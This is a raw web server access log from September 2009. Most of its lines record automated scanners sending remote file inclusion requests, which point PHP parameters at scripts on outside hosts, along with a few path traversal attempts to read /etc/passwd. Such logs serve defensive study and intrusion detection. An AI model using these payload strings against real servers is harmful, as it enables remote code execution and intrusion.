92.50.143.90 - - [07/Sep/2009:11:33:35 -0500] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:11:33:37 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:11:34:53 -0500] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:11:34:53 -0500] "GET /logs/access_log.1237852800/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:11:34:53 -0500] "GET /logs/access_log.1242086400/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
92.50.143.90 - - [07/Sep/2009:11:34:55 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 204070 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:35:55 -0500] "GET /logs/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 296 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:35:55 -0500] "GET /e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 291 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:35:55 -0500] "GET /logs/access_log.1237852800/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.73.17.7 - - [07/Sep/2009:11:36:00 -0500] "GET /logs/access_log.1242086400/e404.php?DOCUMENT_ROOT=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 318 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:36:02 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
222.236.47.188 - - [07/Sep/2009:11:36:10 -0500] "GET /logs/access_log.1237334400/historytemplate.php?cms[support]=1&cms[tngpath]=http://www.gswheel.com/gswheel_system_bak/skin/board/anystyle/thumbs/idxx.txt?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:11:40:28 -0500] "GET //citywriter/head.php?path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 303 "-""libwww-perl/5.811"
72.29.82.154 - - [07/Sep/2009:11:40:28 -0500] "GET /logs//citywriter/head.php?path=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.811"
65.55.207.119 - - [07/Sep/2009:11:41:35 -0500] "GET /logs/access_log.1151107200 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
79.174.78.83 - - [07/Sep/2009:11:42:38 -0500] "GET //embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:42:38 -0500] "GET /logs/access_log.1247875200//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:42:38 -0500] "GET /logs//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:42:41 -0500] "GET /logs/access_log.1242518400//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:42:51 -0500] "GET /logs/access_log.1239926400//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:42:51 -0500] "GET //appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:42:51 -0500] "GET /logs//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:43:35 -0500] "GET /logs/access_log.1243555200//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:44:12 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
82.151.132.176 - - [07/Sep/2009:11:44:52 -0500] "GET //appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:44:52 -0500] "GET /logs/access_log.1237075200//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:44:52 -0500] "GET /logs//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:11:45:18 -0500] "GET /logs/%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:11:45:18 -0500] "GET /logs/access_log.1243641600/%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:11:45:18 -0500] "GET /%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:45:19 -0500] "GET /logs/access_log.1236038400//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:11:45:22 -0500] "GET /logs/access_log.1246233600/%22/index.php?option=http://www.koreadefence.net/data/shirohige/zfxid.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
82.151.132.176 - - [07/Sep/2009:11:45:45 -0500] "GET /logs/access_log.1236211200//appserv/main.php?appserv_root=http://jonrothbard.com/one.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:46:58 -0500] "GET //embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 297 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:46:58 -0500] "GET /logs//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 302 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:46:58 -0500] "GET /logs/access_log.1247875200//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:46:58 -0500] "GET /logs/access_log.1242518400//embed/day.php?path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 324 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:41 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:43 -0500] "GET /logs/access_log.1241222400//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:43 -0500] "GET //?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:43 -0500] "GET //?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:43 -0500] "GET /logs/access_log.1241222400//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:47:44 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:48:08 -0500] "GET /logs/access_log.1241222400//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 404 311 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:48:08 -0500] "GET //?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
80.67.26.40 - - [07/Sep/2009:11:48:09 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.archivverein-herrnhut.de/cms/nGagLiks/zfxid.txt? HTTP/1.1" 200 204075 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:48:19 -0500] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 298 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:48:19 -0500] "GET /logs/access_log.1244246400//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 320 "-""Mozilla/5.0"
79.174.78.83 - - [07/Sep/2009:11:48:19 -0500] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://tahede.ucoz.net/fx29id1.txt? HTTP/1.1" 404 293 "-""Mozilla/5.0"
119.148.69.90 - - [07/Sep/2009:11:49:33 -0500] "GET /logs/default.php?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 299 "-""-"
119.148.69.90 - - [07/Sep/2009:11:49:34 -0500] "GET /default.php?page=./../../../../../../../../etc/passwd%00 HTTP/1.1" 404 294 "-""-"
121.78.116.209 - - [07/Sep/2009:11:51:18 -0500] "GET //appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 300 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:11:51:18 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 305 "-""Mozilla/5.0"
121.78.116.209 - - [07/Sep/2009:11:51:18 -0500] "GET /logs/access_log.1238803200//appserv/main.php?appserv_root=http://www.tabakoff.ru//dimti/AinuLid1.txt? HTTP/1.1" 404 327 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:02 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:02 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:02 -0500] "GET /logs/access_log.1246579200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:11:53:11 -0500] "GET /logs/access_log.1247443200//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:11:53:11 -0500] "GET //bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 331 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:11:53:11 -0500] "GET /logs//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 336 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:11:53:11 -0500] "GET /logs/access_log.1247616000//bbs//skin/ggambo7002_gallery/comment_modify.php?dir=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:19 -0500] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:19 -0500] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
59.150.247.202 - - [07/Sep/2009:11:53:22 -0500] "GET /logs/access_log.1246579200//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.artvariety.co.za/scan/zfxid1.txt?? HTTP/1.1" 404 376 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:11:54:43 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:54:43 -0500] "GET /logs/access_log.1241222400//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:54:43 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:55:20 -0500] "GET /logs/access_log.1241222400//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:55:21 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:55:22 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:55:50 -0500] "GET /logs/access_log.1241222400%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:57:38 -0500] "GET /logs/access_log.1241222400%20//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idi.txt??? HTTP/1.1" 404 368 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:58:51 -0500] "GET /logs/access_log.1241222400//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 367 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:58:55 -0500] "GET //modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 340 "-""libwww-perl/5.79"
211.189.18.73 - - [07/Sep/2009:11:58:56 -0500] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jejucasa.com/bbs//include/idsuper.txt?? HTTP/1.1" 404 345 "-""libwww-perl/5.79"
65.55.106.204 - - [07/Sep/2009:12:02:25 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
218.38.136.251 - - [07/Sep/2009:12:02:57 -0500] "GET /errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:12:02:57 -0500] "GET /logs/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:12:02:57 -0500] "GET /logs/access_log.1236902400/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
218.38.136.251 - - [07/Sep/2009:12:02:57 -0500] "GET /logs/access_log.1240099200/errors.php?error=http://aflamsat.com/kernel/linux/idxx.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
65.55.106.204 - - [07/Sep/2009:12:03:02 -0500] "GET /logs/access_log.1238630400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
203.57.78.8 - - [07/Sep/2009:12:03:09 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
203.57.78.8 - - [07/Sep/2009:12:03:09 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
203.57.78.8 - - [07/Sep/2009:12:03:09 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
203.57.78.8 - - [07/Sep/2009:12:03:13 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0"
65.55.106.157 - - [07/Sep/2009:12:05:04 -0500] "GET /logs/access_log.1239148800 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
78.111.80.234 - - [07/Sep/2009:12:05:17 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 3247 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:12:05:17 -0500] "GET /logs/access_log.1231718400////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
78.111.80.234 - - [07/Sep/2009:12:05:20 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.b92.net/system/files/id1.txt??? HTTP/1.1" 200 204077 "-""Mozilla/5.0"
72.29.82.154 - - [07/Sep/2009:12:06:21 -0500] "GET //bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 309 "-""libwww-perl/5.811"
72.29.82.154 - - [07/Sep/2009:12:06:21 -0500] "GET /logs//bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.compassionbydesign.org/wp-content/idv6.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.811"
75.126.86.185 - - [07/Sep/2009:12:07:13 -0500] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:27 -0500] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:27 -0500] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:27 -0500] "GET /logs/access_log.1239580800/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:27 -0500] "GET /logs/access_log.1236470400/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:31 -0500] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:31 -0500] "GET /logs/access_log.1239580800/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
75.126.86.185 - - [07/Sep/2009:12:07:31 -0500] "GET /logs/access_log.1236470400/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
204.3.129.73 - - [07/Sep/2009:12:08:11 -0500] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 322 "-""Mozilla/5.0"
204.3.129.73 - - [07/Sep/2009:12:08:11 -0500] "GET /logs/access_log.1244764800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 349 "-""Mozilla/5.0"
204.3.129.73 - - [07/Sep/2009:12:08:11 -0500] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 327 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:08:27 -0500] "GET /logs/access_log.1239580800/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:08:27 -0500] "GET /phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 358 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:08:27 -0500] "GET /logs/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 363 "-""Mozilla/5.0"
174.37.136.126 - - [07/Sep/2009:12:08:27 -0500] "GET /logs/access_log.1236470400/phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://www.canasta-banditen.de/phpkit/css/copyright.txt???? HTTP/1.1" 404 385 "-""Mozilla/5.0"
204.3.129.73 - - [07/Sep/2009:12:08:58 -0500] "GET /logs/access_log.1243814400//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 349 "-""Mozilla/5.0"
204.3.129.73 - - [07/Sep/2009:12:08:59 -0500] "GET /logs/access_log.1244505600//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.gsg-duesseldorf.de/assets/snippets/reflect/id.txt?? HTTP/1.0" 404 349 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:12:09:28 -0500] "GET /logs/access_log.1246492800//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:12:09:28 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
208.64.216.6 - - [07/Sep/2009:12:09:28 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/baner.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:12:40 -0500] "GET /logs/access_log.1241222400/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:12:40 -0500] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:12:42 -0500] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
209.172.33.230 - - [07/Sep/2009:12:12:47 -0500] "GET //wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 331 "-""libwww-perl/5.812"
209.172.33.230 - - [07/Sep/2009:12:12:47 -0500] "GET /logs//wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=http://sampnode.co.za/mambots/editors/yes.txt??? HTTP/1.1" 404 336 "-""libwww-perl/5.812"
211.189.18.73 - - [07/Sep/2009:12:12:50 -0500] "GET /logs/access_log.1242432000/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:13:03 -0500] "GET /admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 319 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:13:03 -0500] "GET /logs/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 324 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:13:04 -0500] "GET /logs/access_log.1241222400/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
211.189.18.73 - - [07/Sep/2009:12:13:10 -0500] "GET /logs/access_log.1242432000/admin/editeur/spaw_control.class.php?spaw_root=http://shanghaisisa.com/chboard/images/id1.txt?? HTTP/1.1" 404 346 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:53 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:53 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:54 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:54 -0500] "GET /logs/access_log.1236038400//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 339 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:54 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 312 "-""Mozilla/5.0"
74.50.85.104 - - [07/Sep/2009:12:13:54 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 317 "-""Mozilla/5.0"
